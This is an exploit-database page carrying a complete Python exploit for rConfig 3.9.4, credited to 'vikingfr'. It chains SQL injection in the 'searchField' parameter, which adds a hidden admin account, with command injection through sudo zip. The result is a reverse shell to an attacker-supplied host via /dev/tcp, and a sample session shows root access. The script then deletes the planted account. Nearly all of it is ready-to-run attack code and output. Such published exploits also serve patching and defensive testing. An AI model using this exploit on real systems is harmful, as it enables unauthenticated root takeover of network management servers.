Registerrconfig 3.9.4 searchfield unauthenticated root remote code execution
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution # Exploit Author: vikingfr # Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) # Date: 2020-03-12 # CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 # Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) # Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Version: tested v3.9.4 # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 # # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # # Example : # $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 # rConfig - 3.9 - Unauthenticated root RCE # [+] Adding a temporary admin user... # [+] Authenticating as dywzxuvbah... # [+] Logged in successfully, triggering the payload... # [+] Check your listener ! # [+] The reverse shell seems to be opened :-) # [+] Removing the temporary admin user... # [+] Done. # # $ nc -nvlp 3334 # listening on [any] 3334 ... # connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 # sh: no job control in this shell # sh-4.2# id # id # uid=0(root) gid=0(root) groups=0(root) # sh-4.2# #!/usr/bin/python3 import requests import sys import urllib.parse import string import random from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) from requests.exceptions import Timeout print ("rConfig - 3.9 - Unauthenticated root RCE") if len(sys.argv) != 4: print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort") exit() target = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] vuln_page="/commands.inc.php" vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command" def generateUsername(stringLength=8): u= string.ascii_lowercase return ''.join(random.sample(u,stringLength)) print ("[+] Adding a temporary admin user...") fake_id = str(random.randint(200,900)) fake_user = generateUsername(10) fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin' fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d" userleveladmin = 9 # Administrator addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--" encoded_request = target+vuln_page+vuln_parameters+addUserPayload firstrequest = requests.session() exploit_req = firstrequest.get(encoded_request,verify=False) request = requests.session() login_info = { "user": fake_user, "pass": "admin", "sublogin": 1 } print ("[+] Authenticating as "+fake_user+"...") login_request = request.post( target+"/lib/crud/userprocess.php", login_info, verify=False, allow_redirects=True ) dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False) payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) if dashboard_request.status_code == 200: print ("[+] Logged in successfully, triggering the payload...") encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload)) print ("[+] Check your listener !") try: exploit_req = request.get(encoded_request,timeout=10) except Timeout: print('[+] The reverse shell seems to be opened :-)') else: print('[-] The command was not executed by the target or you forgot to open a listener...') elif dashboard_request.status_code == 302: print ("[-] Wrong credentials !? Maybe admin were not added...") exit() print("[+] Removing the temporary admin user...") delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--" encoded_request = target+vuln_page+vuln_parameters+delUserPayload lastrequest = requests.session() exploit_req = lastrequest.get(encoded_request,verify=False) print ("[+] Done.")
Rconfig 3.9.4 searchfield unauthenticated root remote code execution Vulnerability / Exploit Source : Rconfig 3.9.4 searchfield unauthenticated root remote code execution
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes